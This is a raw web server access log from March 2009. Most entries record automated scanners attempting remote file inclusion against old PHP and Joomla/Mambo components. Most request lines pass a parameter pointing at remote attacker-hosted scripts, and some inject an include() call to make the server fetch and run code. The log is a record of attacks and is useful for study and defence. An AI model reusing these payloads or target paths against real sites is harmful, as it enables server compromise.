85.12.31.98 - - [13/Mar/2009:01:30:08 -0500] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 346 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.12.31.98 - - [13/Mar/2009:01:30:08 -0500] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 351 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.12.31.98 - - [13/Mar/2009:01:30:08 -0500] "GET /logs/access_log.1219536000//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 373 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
85.12.31.98 - - [13/Mar/2009:01:30:27 -0500] "GET /logs/access_log.1211932800//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/id1.txt??%0D? HTTP/1.1" 404 373 "-""Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)"
206.130.11.80 - - [13/Mar/2009:01:32:01 -0500] "GET /logs/access_log.1215043200//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/ade.txt??%0D?? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
206.130.11.80 - - [13/Mar/2009:01:32:04 -0500] "GET //components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/ade.txt??%0D?? HTTP/1.1" 404 346 "-""libwww-perl/5.79"
206.130.11.80 - - [13/Mar/2009:01:32:04 -0500] "GET /logs//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/ade.txt??%0D?? HTTP/1.1" 404 351 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:01:32:14 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
206.130.11.80 - - [13/Mar/2009:01:32:18 -0500] "GET /logs/access_log.1214524800//components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.mishalls.com//config/ade.txt??%0D?? HTTP/1.1" 404 373 "-""libwww-perl/5.79"
195.47.67.57 - - [13/Mar/2009:01:32:19 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:32:22 -0500] "GET /logs/access_log.1216684800%20%20//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:01:32:47 -0500] "GET /logs/access_log.1212364800%20%20//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:01:32:47 -0500] "GET //?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:01:32:48 -0500] "GET /logs//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 200 122044 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:01 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:01 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:01 -0500] "GET /logs/access_log.1216684800%20%20//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:33:13 -0500] "GET //include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:33:13 -0500] "GET /logs//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:33:13 -0500] "GET /logs/access_log.1216684800//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
195.47.67.57 - - [13/Mar/2009:01:33:29 -0500] "GET /logs/access_log.1215993600//include/admin.lib.inc.php?site_path=http://gumansin.com/id.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:48 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:48 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:33:48 -0500] "GET /logs/access_log.1217635200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:01:33:48 -0500] "GET /logs/access_log.1215216000%20%20//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
113.11.196.19 - - [13/Mar/2009:01:33:53 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.65"
113.11.196.19 - - [13/Mar/2009:01:33:54 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.65"
113.11.196.19 - - [13/Mar/2009:01:33:54 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.65"
211.202.2.220 - - [13/Mar/2009:01:33:58 -0500] "GET /logs/access_log.1217548800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://gumansin.com/id.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
122.116.105.23 - - [13/Mar/2009:01:34:47 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.817"
122.116.105.23 - - [13/Mar/2009:01:34:48 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.817"
122.116.105.23 - - [13/Mar/2009:01:34:48 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.817"
62.128.131.80 - - [13/Mar/2009:01:37:11 -0500] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:37:12 -0500] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:37:34 -0500] "GET /logs/index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
62.128.131.80 - - [13/Mar/2009:01:37:34 -0500] "GET /index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.elitewheels.ru/images/stories/.cnn?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.76.163.60 - - [13/Mar/2009:01:37:41 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:37:41 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:37:41 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:38:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:38:03 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:38:03 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.18.123.42 - - [13/Mar/2009:01:38:03 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
61.16.172.4 - - [13/Mar/2009:01:40:11 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.79"
61.16.172.4 - - [13/Mar/2009:01:40:17 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.79"
61.16.172.4 - - [13/Mar/2009:01:40:17 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.79"
70.38.31.50 - - [13/Mar/2009:01:40:30 -0500] "GET /logs/access_log.1211328000//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
70.38.31.50 - - [13/Mar/2009:01:40:39 -0500] "GET /logs/access_log.1211932800//?path%5Bdocroot%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.202.2.220 - - [13/Mar/2009:01:41:14 -0500] "GET /logs/access_log.1211328000/tools/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?????%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:01:41:14 -0500] "GET /tools/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?????%0D?? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:01:41:14 -0500] "GET /logs/tools/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?????%0D?? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
211.202.2.220 - - [13/Mar/2009:01:41:21 -0500] "GET /logs/access_log.1210204800/tools/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?????%0D?? HTTP/1.1" 404 335 "-""libwww-perl/5.79"
66.235.124.132 - - [13/Mar/2009:01:41:38 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [13/Mar/2009:01:41:38 -0500] "GET /costume/ HTTP/1.1" 200 640 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9a1) Gecko/20070308 Minefield/3.0a1"
201.11.166.137 - - [13/Mar/2009:01:43:09 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:43:10 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:43:11 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:44:16 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:44:16 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:44:17 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
201.11.166.137 - - [13/Mar/2009:01:44:17 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
211.202.2.220 - - [13/Mar/2009:01:44:40 -0500] "GET /logs/access_log.1215302400%20/tools/send_reminders.php?includedir=http://www.proostjes.be/calendar/help01.txt?????%0D?? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
124.217.242.70 - - [13/Mar/2009:01:45:41 -0500] "GET /logs/?sourcedir=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122039 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:01:45:42 -0500] "GET /?sourcedir=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:01:45:42 -0500] "GET /logs/?sourcedir=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 122039 "-""libwww-perl/5.812"
124.217.242.70 - - [13/Mar/2009:01:45:44 -0500] "GET /?sourcedir=http://zacs.ca/blm/images/banner.jpg?? HTTP/1.1" 200 1243 "-""libwww-perl/5.812"
208.25.206.130 - - [13/Mar/2009:01:45:57 -0500] "GET /logs/access_log.1214352000/index.php?id=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
77.91.201.31 - - [13/Mar/2009:01:46:06 -0500] "GET /logs/?sourcedir=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 122039 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:01:46:06 -0500] "GET /?sourcedir=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:01:46:13 -0500] "GET /logs/?sourcedir=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122039 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:01:46:14 -0500] "GET /?sourcedir=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
122.116.105.23 - - [13/Mar/2009:01:46:42 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.817"
122.116.105.23 - - [13/Mar/2009:01:46:43 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.817"
200.165.79.34 - - [13/Mar/2009:01:46:45 -0500] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:01:46:45 -0500] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:01:46:45 -0500] "GET /logs/access_log.1216512000%20%20/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
216.65.1.253 - - [13/Mar/2009:01:46:52 -0500] "GET /logs/access_log.1210204800//admin.php?include_path=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.65.1.253 - - [13/Mar/2009:01:46:52 -0500] "GET /logs/access_log.1210204800//admin.php?include_path=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 321 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.65.1.253 - - [13/Mar/2009:01:46:52 -0500] "GET //admin.php?include_path=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
216.65.1.253 - - [13/Mar/2009:01:46:52 -0500] "GET //admin.php?include_path=http://www.sportsvideo.org//portal/id2? HTTP/1.1" 404 294 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
200.165.79.34 - - [13/Mar/2009:01:47:38 -0500] "GET /lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:01:47:38 -0500] "GET /logs/access_log.1216512000/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:01:47:39 -0500] "GET /logs/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
122.116.105.23 - - [13/Mar/2009:01:47:43 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.817"
122.116.105.23 - - [13/Mar/2009:01:47:44 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.817"
70.38.11.214 - - [13/Mar/2009:01:47:47 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:47 -0500] "GET /logs/access_log.1217289600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 384 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:47 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:54 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:54 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:54 -0500] "GET /logs/access_log.1217289600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 384 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:57 -0500] "GET /logs/access_log.1217289600/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 384 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:57 -0500] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 357 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:47:57 -0500] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 362 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:13 -0500] "GET /logs/access_log.1219536000/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:13 -0500] "GET /modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:13 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:16 -0500] "GET /modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:16 -0500] "GET /logs/access_log.1219536000/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:16 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:24 -0500] "GET /modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:24 -0500] "GET /logs/access_log.1219536000/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.814"
70.38.11.214 - - [13/Mar/2009:01:48:24 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://admins.onceinalifespan.com/gid.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.814"
208.25.206.130 - - [13/Mar/2009:01:49:28 -0500] "GET /logs/access_log.1214352000/index.php?content=http://www.aerothaiunion.com/sik.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
200.165.79.34 - - [13/Mar/2009:01:51:12 -0500] "GET /logs/access_log.1217289600/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
200.165.79.34 - - [13/Mar/2009:01:51:41 -0500] "GET /logs/access_log.1217289600%20%20/lostpasswd.php?env%5Binclude_prefix%5D=http://gumansin.com/id.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:54:04 -0500] "GET /playing.php/common/db.php?commonpath=http://gumansin.com/id.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:54:04 -0500] "GET /logs/access_log.1215216000%20%20/playing.php/common/db.php?commonpath=http://gumansin.com/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:54:04 -0500] "GET /logs/playing.php/common/db.php?commonpath=http://gumansin.com/id.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
67.76.163.60 - - [13/Mar/2009:01:54:29 -0500] "GET /logs/access_log.1225670400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.18.123.42 - - [13/Mar/2009:01:54:39 -0500] "GET /logs/access_log.1219536000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 369 "-""libwww-perl/5.805"
210.18.123.42 - - [13/Mar/2009:01:54:40 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
210.18.123.42 - - [13/Mar/2009:01:54:40 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
67.76.163.60 - - [13/Mar/2009:01:55:17 -0500] "GET /logs/access_log.1218672000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.18.123.42 - - [13/Mar/2009:01:55:22 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
210.18.123.42 - - [13/Mar/2009:01:55:23 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
67.76.163.60 - - [13/Mar/2009:01:59:15 -0500] "GET /logs/access_log.1225670400/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
210.18.123.42 - - [13/Mar/2009:01:59:19 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
210.18.123.42 - - [13/Mar/2009:01:59:20 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://t24ever.com/id.txt?? HTTP/1.1" 404 342 "-""libwww-perl/5.805"
200.45.224.18 - - [13/Mar/2009:02:00:58 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://k-m-k.ru//administrator/modules/test.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
200.45.224.18 - - [13/Mar/2009:02:00:58 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://k-m-k.ru//administrator/modules/test.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
67.76.163.60 - - [13/Mar/2009:02:02:29 -0500] "GET /logs/access_log.1218672000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://gumansin.com/id.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
83.167.62.172 - - [13/Mar/2009:02:03:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
83.167.62.172 - - [13/Mar/2009:02:03:20 -0500] "GET /?N=D HTTP/1.1" 200 1243 "-""Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)"
77.91.201.31 - - [13/Mar/2009:02:03:42 -0500] "GET /logs/access_log.1217030400/?sourcedir=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 404 311 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:02:03:42 -0500] "GET /?sourcedir=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:02:03:44 -0500] "GET /logs/?sourcedir=http://www.jungga.co.kr/zboard//skin/zero_vote/images/idfell.txt? HTTP/1.1" 200 122039 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:02:03:54 -0500] "GET /logs/access_log.1217030400/?sourcedir=http://kashikicks.ru/id.txt?? HTTP/1.1" 404 311 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:02:03:55 -0500] "GET /?sourcedir=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.823"
77.91.201.31 - - [13/Mar/2009:02:03:56 -0500] "GET /logs/?sourcedir=http://kashikicks.ru/id.txt?? HTTP/1.1" 200 122039 "-""libwww-perl/5.823"
213.236.166.68 - - [13/Mar/2009:02:04:42 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://k-m-k.ru//administrator/modules/test.txt?? HTTP/1.1" 404 340 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
